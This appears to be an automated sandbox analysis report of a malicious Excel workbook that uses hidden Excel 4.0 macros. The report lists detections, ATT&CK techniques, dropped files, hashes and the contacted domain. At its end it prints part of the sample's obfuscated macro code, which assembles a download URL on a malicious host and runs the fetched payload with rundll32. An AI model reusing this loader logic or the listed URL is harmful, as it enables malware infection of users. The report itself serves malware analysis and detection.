Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918
Overview
General Information
Sample Name: | SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918 (renamed file extension from 7918 to xls) |
Analysis ID: | 383012 |
MD5: | 73690262256f3a4872aaadb37acac4ed |
SHA1: | cd4327807142a8815c3a13a46ddb7abd8f23b32f |
SHA256: | 2cf291ca376a58d5ed057798b78331d28e1b16efcf193181ed0f85ecb05dac76 |
Infos: | |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for dropped file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
15% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | Virustotal | Browse | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
22% | Virustotal | Browse | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
13% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383012 |
Start date: | 07.04.2021 |
Start time: | 05:50:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 14s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918 (renamed file extension from 7918 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
05:50:36 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\sdbybsd.fds | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67964 |
Entropy (8bit): | 7.879577385154599 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF708e:LqeRrW2JyW32AiHD2sTU2yF709 |
MD5: | A8277AE08A00AFC47C725FB7151E19E3 |
SHA1: | B6AD494C2118AD8359866EC834D0BA273506C94F |
SHA-256: | 8362EFE7B14628196417DA547779C1668BDECC4BBC37E84D0AAF4AF61421BCC7 |
SHA-512: | 49549CAA43DF189B9021CE9CFFA769A63A89248C9154903EB7173FE9DB55C5FEDD1255BC6A4233DD014D4DBE384478F5583C2745CD509B5AF50D0E70DF4524B8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.024556459201917 |
Encrypted: | false |
SSDEEP: | 48:Kb6U7R56fOgWh3czl7JQb6U7D6LHf+6snQvOKFY+87bqmt:Kb6QRZmzhJQb6QDe2pKFqV |
MD5: | 58A921083296E0FD3025512CBAD7BEBC |
SHA1: | 4885166BB85D9F90305D168E04B5A4DF3F41E596 |
SHA-256: | CFAC2DC72B37737B32788D0C3AC1B95E1C48DC8BFEC98876D82EB6320ADF787E |
SHA-512: | 14433A360E82BA3E4A6E9CE37236DD53F7456EAD009061D70B71CFDA6254703A96493B668796D1FAB3FC1F00D9079D48F118F5A79DF1C5000453736243F21915 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.487959229584415 |
Encrypted: | false |
SSDEEP: | 12:85QEcLgXg/XAlCPCHaXSzB8aB/yVU7UX+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP8:85hK/XTK6aMdYeQSDv3qIrNru/ |
MD5: | 0E11E63BAC993E1B743747D23F23610A |
SHA1: | 5CCCBFF23FD96ADC6380767A4829DA0ADFA82EA4 |
SHA-256: | 6B42734BB2769A59AC73D85E63EE7A150F9491B1A8F1852F584F0666A3F84AC0 |
SHA-512: | A9808C7954EE34A8A508DE39E1385083FF60869345431120A65A49300A6492A02298E04617DC0FC56BB74DF1CFEFAE6C535F94FB4645DA6E3B13E2DEDC7F3FC1 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2328 |
Entropy (8bit): | 4.591638833555375 |
Encrypted: | false |
SSDEEP: | 48:8B/XTZaHT8Hig1C5Hi4IQh2B/XTZaHT8Hig1C5Hi4IQ/:8B/X1aHgCl44IQh2B/X1aHgCl44IQ/ |
MD5: | E9B16D312416710B760276522658F435 |
SHA1: | 928C06D16F71C9E76E72D9A21295352B9FDCBC6F |
SHA-256: | BBF5BCC7696C23684D7D1CABAB1C6F4DAA297CC0A89BA4774362DC9E2B0E3C69 |
SHA-512: | BFB89340AE3CFCF4F097F9154119285032B43655A66E9208C2AE4DC59ABD48B48A197AC41ACC801124AC82369F07244D29AC028CB548C1D022864AE7E9820145 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 173 |
Entropy (8bit): | 4.969986660341752 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0b3kVG3ouscb3kVG3omM0b3kVG3ov:dj60gVG3VgVG360gVG3y |
MD5: | 47537AFB9DEBE73D15C74E68538B4FF1 |
SHA1: | A77F3C7C9F1954206C76EAFD93879BF078F1AC9D |
SHA-256: | 424F8E77FCBA0ADF59E49D2B0D980DF2EA309C9DD21C2C3B44F2540336BC7170 |
SHA-512: | D97C3870E7605637EF5BD4AE740A67B08F8394D43F630E1E20A3546AD5975A15D6EB0F565DFEDC522EC79AFE974DABEBDACE799FD1F569ACEF000A29051C9CE4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230560164184499 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSe2jTUqyF70mi+W2DzaErDzaE4I8rmj2:G8rmjAItyzElBIL6lECbgBvP5NmuCS9r |
MD5: | EA451112F1D8D41D155AAFB8D773343C |
SHA1: | F5BBB5528EC9876E2F264046F0501299288CBE77 |
SHA-256: | 24E44471DF7E4306096C440A869275FF1D5A8956111D6CA86F3262184801B62B |
SHA-512: | B58D51F006C59BC772709365990D99D98B70CE30F67235E6A6CFF38427DD9D57918A97D2BEC4383D012C5D7F98F8C06AB53F8A873003277D0D6554DAC6904FEA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls |
File size: | 267776 |
MD5: | 73690262256f3a4872aaadb37acac4ed |
SHA1: | cd4327807142a8815c3a13a46ddb7abd8f23b32f |
SHA256: | 2cf291ca376a58d5ed057798b78331d28e1b16efcf193181ed0f85ecb05dac76 |
SHA512: | 337844fd0357db123d607480c51044cd3d8005bfbfc17bd4ae50d7a055c126e7b4d23258068ed0d5ac7e77b6980ca67fda24b6e80c98c2ca1943a1d048cb2125 |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0e:Fhe |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247521269318 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN